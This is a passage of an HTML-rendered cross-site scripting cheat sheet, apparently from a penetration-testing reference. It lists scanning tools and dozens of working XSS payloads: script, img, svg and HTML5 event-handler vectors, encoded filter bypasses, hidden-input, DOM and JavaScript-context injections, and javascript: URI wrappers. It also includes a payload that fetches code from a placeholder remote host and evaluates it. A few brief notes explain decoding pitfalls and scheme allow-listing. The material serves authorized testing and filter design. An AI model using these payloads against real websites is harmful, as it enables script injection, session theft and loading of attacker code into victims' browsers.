<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">domain</span><span class="p">.</span><span class="nx">concat</span><span class="p">(</span><span class="s2">&quot;\n&quot;</span><span class="p">).</span><span class="nx">concat</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">origin</span><span class="p">))&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>
<p>While <code>alert()</code> is fine for reflected XSS, it can quickly become a burden for stored XSS because the popup has to be closed on every execution, so <code>console.log()</code> can be used instead to display a message in the developer console (it doesn't require any interaction).</p>
<p>Example:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">&quot;Test XSS from the search bar of page XYZ\n&quot;</span><span class="p">.</span><span class="nx">concat</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">domain</span><span class="p">).</span><span class="nx">concat</span><span class="p">(</span><span class="s2">&quot;\n&quot;</span><span class="p">).</span><span class="nx">concat</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">origin</span><span class="p">))&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>
<p>References:</p>
<ul>
<li><a href="https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain">Google Bughunter University - XSS in sandbox domains</a></li>
<li><a href="https://www.youtube.com/watch?v=KHwVjzWei1c">LiveOverflow Video - DO NOT USE alert(1) for XSS</a></li>
<li><a href="https://liveoverflow.com/do-not-use-alert-1-in-xss/">LiveOverflow blog post - DO NOT USE alert(1) for XSS</a></li>
</ul>
<h3 id="tools">Tools</h3>
<p>Most tools are also suitable for blind XSS attacks:</p>
<ul>
<li><a href="https://github.com/s0md3v/XSStrike">XSStrike</a>: Very popular but unfortunately not very well maintained</li>
<li><a href="https://github.com/epsylon/xsser">xsser</a>: Utilizes a headless browser to detect XSS vulnerabilities</li>
<li><a href="https://github.com/hahwul/dalfox">Dalfox</a>: Extensive functionality and extremely fast thanks to the implementation in Go</li>
<li><a href="https://github.com/hahwul/XSpear">XSpear</a>: Similar to Dalfox but based on Ruby</li>
<li><a href="https://github.com/fcavallarin/domdig">domdig</a>: Headless Chrome XSS Tester</li>
</ul>
<h2 id="xss-in-htmlapplications">XSS in HTML/Applications</h2>
<h3 id="common-payloads">Common Payloads</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="c1">// Basic payload</span>
<a id="__codelineno-8-2" name="__codelineno-8-2" href="#__codelineno-8-2"></a><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;XSS&#39;</span><span class="p">)</span><span class="o">&lt;</span><span class="err">/script&gt;</span>
<a id="__codelineno-8-3" name="__codelineno-8-3" href="#__codelineno-8-3"></a><span class="o">&lt;</span><span class="nx">scr</span><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">ipt</span><span class="o">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;XSS&#39;</span><span class="p">)</span><span class="o">&lt;</span><span class="err">/scr&lt;script&gt;ipt&gt;</span>
<a id="__codelineno-8-4" name="__codelineno-8-4" href="#__codelineno-8-4"></a><span class="s2">&quot;&gt;&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;</span>
<a id="__codelineno-8-5" name="__codelineno-8-5" href="#__codelineno-8-5"></a><span class="s2">&quot;</span><span class="o">&gt;&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mf">88</span><span class="p">,</span><span class="mf">83</span><span class="p">,</span><span class="mf">83</span><span class="p">))</span><span class="o">&lt;</span><span class="err">/script&gt;</span>
<a id="__codelineno-8-6" name="__codelineno-8-6" href="#__codelineno-8-6"></a><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">\u0061lert</span><span class="p">(</span><span class="s1">&#39;22&#39;</span><span class="p">)</span><span class="o">&lt;</span><span class="err">/script&gt;</span>
<a id="__codelineno-8-7" name="__codelineno-8-7" href="#__codelineno-8-7"></a><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nb">eval</span><span class="p">(</span><span class="s1">&#39;\x61lert(\&#39;33\&#39;)&#39;</span><span class="p">)</span><span class="o">&lt;</span><span class="err">/script&gt;</span>
<a id="__codelineno-8-8" name="__codelineno-8-8" href="#__codelineno-8-8"></a><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nb">eval</span><span class="p">(</span><span class="mf">8680439.</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mf">30</span><span class="p">))(</span><span class="mf">983801.</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mf">36</span><span class="p">))</span><span class="o">&lt;</span><span class="sr">/script&gt; /</span><span class="o">/</span><span class="nb">parseInt</span><span class="p">(</span><span class="s2">&quot;confirm&quot;</span><span class="p">,</span><span class="mf">30</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mf">8680439</span><span class="w"> </span><span class="o">&amp;&amp;</span><span class="w"> </span><span class="mf">8680439.</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mf">30</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s2">&quot;confirm&quot;</span>
<a id="__codelineno-8-9" name="__codelineno-8-9" href="#__codelineno-8-9"></a><span class="o">&lt;</span><span class="nx">object</span><span class="o">/</span><span class="nx">data</span><span class="o">=</span><span class="s2">&quot;jav&amp;#x61;sc&amp;#x72;ipt&amp;#x3a;al&amp;#x65;rt&amp;#x28;23&amp;#x29;&quot;</span><span class="o">&gt;</span>
<a id="__codelineno-8-10" name="__codelineno-8-10" href="#__codelineno-8-10"></a>
<a id="__codelineno-8-11" name="__codelineno-8-11" href="#__codelineno-8-11"></a><span class="c1">// Img payload</span>
<a id="__codelineno-8-12" name="__codelineno-8-12" href="#__codelineno-8-12"></a><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;XSS&#39;</span><span class="p">);</span><span class="o">&gt;</span>
<a id="__codelineno-8-13" name="__codelineno-8-13" href="#__codelineno-8-13"></a><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;XSS&#39;</span><span class="p">)</span><span class="c1">//</span>
<a id="__codelineno-8-14" name="__codelineno-8-14" href="#__codelineno-8-14"></a><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mf">88</span><span class="p">,</span><span class="mf">83</span><span class="p">,</span><span class="mf">83</span><span class="p">));</span><span class="o">&gt;</span>
<a id="__codelineno-8-15" name="__codelineno-8-15" href="#__codelineno-8-15"></a><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="w"> </span><span class="nx">oneonerrorrror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mf">88</span><span class="p">,</span><span class="mf">83</span><span class="p">,</span><span class="mf">83</span><span class="p">));</span><span class="o">&gt;</span>
<a id="__codelineno-8-16" name="__codelineno-8-16" href="#__codelineno-8-16"></a><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="o">:</span><span class="nx">alert</span><span class="p">(</span><span class="nx">alt</span><span class="p">)</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nb">eval</span><span class="p">(</span><span class="nx">src</span><span class="p">)</span><span class="w"> </span><span class="nx">alt</span><span class="o">=</span><span class="nx">xss</span><span class="o">&gt;</span>
<a id="__codelineno-8-17" name="__codelineno-8-17" href="#__codelineno-8-17"></a><span class="s2">&quot;&gt;&lt;img src=x onerror=alert(&#39;XSS&#39;);&gt;</span>
<a id="__codelineno-8-18" name="__codelineno-8-18" href="#__codelineno-8-18"></a><span class="s2">&quot;</span><span class="o">&gt;&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mf">88</span><span class="p">,</span><span class="mf">83</span><span class="p">,</span><span class="mf">83</span><span class="p">));</span><span class="o">&gt;</span>
<a id="__codelineno-8-19" name="__codelineno-8-19" href="#__codelineno-8-19"></a><span class="o">&lt;&gt;&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="mf">1</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-8-20" name="__codelineno-8-20" href="#__codelineno-8-20"></a>
<a id="__codelineno-8-21" name="__codelineno-8-21" href="#__codelineno-8-21"></a><span class="c1">// Svg payload</span>
<a id="__codelineno-8-22" name="__codelineno-8-22" href="#__codelineno-8-22"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="w"> </span><span class="nx">onload</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-8-23" name="__codelineno-8-23" href="#__codelineno-8-23"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">/</span><span class="nx">onload</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;XSS&#39;</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-8-24" name="__codelineno-8-24" href="#__codelineno-8-24"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="w"> </span><span class="nx">onload</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="c1">//</span>
<a id="__codelineno-8-25" name="__codelineno-8-25" href="#__codelineno-8-25"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">/</span><span class="nx">onload</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mf">88</span><span class="p">,</span><span class="mf">83</span><span class="p">,</span><span class="mf">83</span><span class="p">))</span><span class="o">&gt;</span>
<a id="__codelineno-8-26" name="__codelineno-8-26" href="#__codelineno-8-26"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="w"> </span><span class="nx">id</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="w"> </span><span class="nx">onload</span><span class="o">=</span><span class="nb">eval</span><span class="p">(</span><span class="nx">id</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-8-27" name="__codelineno-8-27" href="#__codelineno-8-27"></a><span class="s2">&quot;&gt;&lt;svg/onload=alert(String.fromCharCode(88,83,83))&gt;</span>
<a id="__codelineno-8-28" name="__codelineno-8-28" href="#__codelineno-8-28"></a><span class="s2">&quot;</span><span class="o">&gt;&lt;</span><span class="nx">svg</span><span class="o">/</span><span class="nx">onload</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="sr">/XSS/</span><span class="p">)</span>
<a id="__codelineno-8-29" name="__codelineno-8-29" href="#__codelineno-8-29"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">&gt;&lt;</span><span class="nx">script</span><span class="w"> </span><span class="nx">href</span><span class="o">=</span><span class="nx">data</span><span class="o">:</span><span class="p">,</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="w"> </span><span class="o">/&gt;</span><span class="p">(</span><span class="sb">`Firefox`</span><span class="w"> </span><span class="nx">is</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">only</span><span class="w"> </span><span class="nx">browser</span><span class="w"> </span><span class="nx">which</span><span class="w"> </span><span class="nx">allows</span><span class="w"> </span><span class="nx">self</span><span class="w"> </span><span class="nx">closing</span><span class="w"> </span><span class="nx">script</span><span class="p">)</span>
<a id="__codelineno-8-30" name="__codelineno-8-30" href="#__codelineno-8-30"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">&gt;&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;33&#39;</span><span class="p">)</span>
<a id="__codelineno-8-31" name="__codelineno-8-31" href="#__codelineno-8-31"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">&gt;&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">alert</span><span class="o">&amp;</span><span class="nx">lpar</span><span class="p">;</span><span class="s1">&#39;33&#39;</span><span class="o">&amp;</span><span class="nx">rpar</span><span class="p">;</span>
<a id="__codelineno-8-32" name="__codelineno-8-32" href="#__codelineno-8-32"></a>
<a id="__codelineno-8-33" name="__codelineno-8-33" href="#__codelineno-8-33"></a><span class="c1">// Div payload</span>
<a id="__codelineno-8-34" name="__codelineno-8-34" href="#__codelineno-8-34"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointerover</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
<a id="__codelineno-8-35" name="__codelineno-8-35" href="#__codelineno-8-35"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointerdown</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
<a id="__codelineno-8-36" name="__codelineno-8-36" href="#__codelineno-8-36"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointerenter</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
<a id="__codelineno-8-37" name="__codelineno-8-37" href="#__codelineno-8-37"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointerleave</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
<a id="__codelineno-8-38" name="__codelineno-8-38" href="#__codelineno-8-38"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointermove</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
<a id="__codelineno-8-39" name="__codelineno-8-39" href="#__codelineno-8-39"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointerout</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
<a id="__codelineno-8-40" name="__codelineno-8-40" href="#__codelineno-8-40"></a><span class="o">&lt;</span><span class="nx">div</span><span class="w"> </span><span class="nx">onpointerup</span><span class="o">=</span><span class="s2">&quot;alert(45)&quot;</span><span class="o">&gt;</span><span class="nx">MOVE</span><span class="w"> </span><span class="nx">HERE</span><span class="o">&lt;</span><span class="err">/div&gt;</span>
</code></pre></div>
<h3 id="xss-using-html5-tags">XSS using HTML5 tags</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a><span class="o">&lt;</span><span class="nx">body</span><span class="w"> </span><span class="nx">onload</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="sr">/XSS/</span><span class="p">.</span><span class="nx">source</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a><span class="o">&lt;</span><span class="nx">input</span><span class="w"> </span><span class="nx">autofocus</span><span class="w"> </span><span class="nx">onfocus</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-3" name="__codelineno-9-3" href="#__codelineno-9-3"></a><span class="o">&lt;</span><span class="nx">select</span><span class="w"> </span><span class="nx">autofocus</span><span class="w"> </span><span class="nx">onfocus</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-4" name="__codelineno-9-4" href="#__codelineno-9-4"></a><span class="o">&lt;</span><span class="nx">textarea</span><span class="w"> </span><span class="nx">autofocus</span><span class="w"> </span><span class="nx">onfocus</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-5" name="__codelineno-9-5" href="#__codelineno-9-5"></a><span class="o">&lt;</span><span class="nx">keygen</span><span class="w"> </span><span class="nx">autofocus</span><span class="w"> </span><span class="nx">onfocus</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-6" name="__codelineno-9-6" href="#__codelineno-9-6"></a><span class="o">&lt;</span><span class="nx">video</span><span class="o">/</span><span class="nx">poster</span><span class="o">/</span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-7" name="__codelineno-9-7" href="#__codelineno-9-7"></a><span class="o">&lt;</span><span class="nx">video</span><span class="o">&gt;&lt;</span><span class="nx">source</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="s2">&quot;javascript:alert(1)&quot;</span><span class="o">&gt;</span>
<a id="__codelineno-9-8" name="__codelineno-9-8" href="#__codelineno-9-8"></a><span class="o">&lt;</span><span class="nx">video</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">_</span><span class="w"> </span><span class="nx">onloadstart</span><span class="o">=</span><span class="s2">&quot;alert(1)&quot;</span><span class="o">&gt;</span>
<a id="__codelineno-9-9" name="__codelineno-9-9" href="#__codelineno-9-9"></a><span class="o">&lt;</span><span class="nx">details</span><span class="o">/</span><span class="nx">open</span><span class="o">/</span><span class="nx">ontoggle</span><span class="o">=</span><span class="s2">&quot;alert`1`&quot;</span><span class="o">&gt;</span>
<a id="__codelineno-9-10" name="__codelineno-9-10" href="#__codelineno-9-10"></a><span class="o">&lt;</span><span class="nx">audio</span><span class="w"> </span><span class="nx">src</span><span class="w"> </span><span class="nx">onloadstart</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-11" name="__codelineno-9-11" href="#__codelineno-9-11"></a><span class="o">&lt;</span><span class="nx">marquee</span><span class="w"> </span><span class="nx">onstart</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
<a id="__codelineno-9-12" name="__codelineno-9-12" href="#__codelineno-9-12"></a><span class="o">&lt;</span><span class="nx">meter</span><span class="w"> </span><span class="nx">value</span><span class="o">=</span><span class="mf">2</span><span class="w"> </span><span class="nx">min</span><span class="o">=</span><span class="mf">0</span><span class="w"> </span><span class="nx">max</span><span class="o">=</span><span class="mf">10</span><span class="w"> </span><span class="nx">onmouseover</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span><span class="mf">2</span><span class="w"> </span><span class="nx">out</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="mf">10</span><span class="o">&lt;</span><span class="err">/meter&gt;</span>
<a id="__codelineno-9-13" name="__codelineno-9-13" href="#__codelineno-9-13"></a>
<a id="__codelineno-9-14" name="__codelineno-9-14" href="#__codelineno-9-14"></a><span class="o">&lt;</span><span class="nx">body</span><span class="w"> </span><span class="nx">ontouchstart</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span><span class="w"> </span><span class="c1">// Triggers when a finger touches the screen</span>
<a id="__codelineno-9-15" name="__codelineno-9-15" href="#__codelineno-9-15"></a><span class="o">&lt;</span><span class="nx">body</span><span class="w"> </span><span class="nx">ontouchend</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span><span class="w"> </span><span class="c1">// Triggers when a finger is removed from touch screen</span>
<a id="__codelineno-9-16" name="__codelineno-9-16" href="#__codelineno-9-16"></a><span class="o">&lt;</span><span class="nx">body</span><span class="w"> </span><span class="nx">ontouchmove</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span><span class="w"> </span><span class="c1">// When a finger is dragged across the screen.</span>
</code></pre></div>
<h3 id="xss-using-a-remote-js">XSS using a remote JS</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="p">&lt;</span><span class="nt">svg</span><span class="err">/</span><span class="na">onload</span><span class="o">=</span><span class="s">&#39;fetch(&quot;//host/a&quot;).then(r=&gt;r.text().then(t=&gt;eval(t)))&#39;</span><span class="p">&gt;</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a><span class="p">&lt;</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">14.rs</span><span class="p">&gt;</span>
<a id="__codelineno-10-3" name="__codelineno-10-3" href="#__codelineno-10-3"></a><span class="c1">// you can also specify an arbitrary payload with 14.rs/#payload</span>
<a id="__codelineno-10-4" name="__codelineno-10-4" href="#__codelineno-10-4"></a>e.g: 14.rs/#alert(document.domain)
</code></pre></div>
<h3 id="xss-in-hidden-input">XSS in Hidden Input</h3>
<p><div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="o">&lt;</span><span class="nx">input</span><span class="w"> </span><span class="nx">type</span><span class="o">=</span><span class="s2">&quot;hidden&quot;</span><span class="w"> </span><span class="nx">accesskey</span><span class="o">=</span><span class="s2">&quot;X&quot;</span><span class="w"> </span><span class="nx">onclick</span><span class="o">=</span><span class="s2">&quot;alert(1)&quot;</span><span class="o">&gt;</span>
<a id="__codelineno-11-2" name="__codelineno-11-2" href="#__codelineno-11-2"></a><span class="nx">Use</span><span class="w"> </span><span class="nx">CTRL</span><span class="o">+</span><span class="nx">SHIFT</span><span class="o">+</span><span class="nx">X</span><span class="w"> </span><span class="nx">to</span><span class="w"> </span><span class="nx">trigger</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">onclick</span><span class="w"> </span><span class="nx">event</span>
</code></pre></div>
In newer browsers (Firefox 130 / Chrome 108):
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="o">&lt;</span><span class="nx">input</span><span class="w"> </span><span class="nx">type</span><span class="o">=</span><span class="s2">&quot;hidden&quot;</span><span class="w"> </span><span class="nx">oncontentvisibilityautostatechange</span><span class="o">=</span><span class="s2">&quot;alert(1)&quot;</span><span class="w"> </span><span class="nx">style</span><span class="o">=</span><span class="s2">&quot;content-visibility:auto&quot;</span><span class="w"> </span><span class="o">&gt;</span>
</code></pre></div></p>
<h3 id="xss-in-uppercase-output">XSS in Uppercase Output</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="o">&lt;</span><span class="nx">IMG</span><span class="w"> </span><span class="nx">SRC</span><span class="o">=</span><span class="mf">1</span><span class="w"> </span><span class="nx">ONERROR</span><span class="o">=&amp;</span><span class="n">#X61</span><span class="p">;</span><span class="o">&amp;</span><span class="n">#X6C</span><span class="p">;</span><span class="o">&amp;</span><span class="n">#X65</span><span class="p">;</span><span class="o">&amp;</span><span class="n">#X72</span><span class="p">;</span><span class="o">&amp;</span><span class="n">#X74</span><span class="p">;(</span><span class="mf">1</span><span class="p">)</span><span class="o">&gt;</span>
</code></pre></div>
<h3 id="dom-based-xss">DOM Based XSS</h3>
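<p>Based on a DOM XSS sink. The example below begins with <code>#</code>, which suggests it is delivered in the URL fragment; the browser does not send the fragment to the server, so server-side filters and request logs never see it, and the fix belongs in the client-side code that writes the value into the page.</p>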
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="err">#&quot;</span><span class="o">&gt;&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="err">/ onerror=alert(2)&gt;</span>
</code></pre></div>
<h3 id="xss-in-js-context">XSS in JS Context</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a><span class="o">-</span><span class="p">(</span><span class="nx">confirm</span><span class="p">)(</span><span class="nb">document</span><span class="p">.</span><span class="nx">domain</span><span class="p">)</span><span class="c1">//</span>
<a id="__codelineno-15-2" name="__codelineno-15-2" href="#__codelineno-15-2"></a><span class="p">;</span><span class="w"> </span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">);</span><span class="c1">//</span>
<a id="__codelineno-15-3" name="__codelineno-15-3" href="#__codelineno-15-3"></a><span class="c1">// (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic))</span>
</code></pre></div>
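<h2 id="xss-in-wrappers-for-uri">XSS in Wrappers for URI</h2>
<p>Each encoded form below depends on a decoding step (HTML entities, percent-encoding, JavaScript string escapes, or the URL parser discarding tab and newline characters) running after a filter has inspected the raw text. Scheme checks are therefore reliable only when applied to the fully decoded, parsed URL, and when they allow a short list of schemes such as <code>http</code> and <code>https</code> instead of rejecting the literal string <code>javascript:</code>.</p>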
<h3 id="wrapper-javascript">Wrapper javascript</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="nx">javascript</span><span class="o">:</span><span class="nx">prompt</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span>
<a id="__codelineno-16-2" name="__codelineno-16-2" href="#__codelineno-16-2"></a>
<a id="__codelineno-16-3" name="__codelineno-16-3" href="#__codelineno-16-3"></a><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23106</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2397</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23118</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2397</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23115</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2399</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23114</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23105</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23112</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23116</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2358</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2399</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23111</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23110</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23102</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23105</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23114</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">23109</span><span class="o">%</span><span class="mf">26</span><span 
class="o">%</span><span class="mf">2340</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2349</span><span class="o">%</span><span class="mf">26</span><span class="o">%</span><span class="mf">2341</span>
<a id="__codelineno-16-4" name="__codelineno-16-4" href="#__codelineno-16-4"></a>
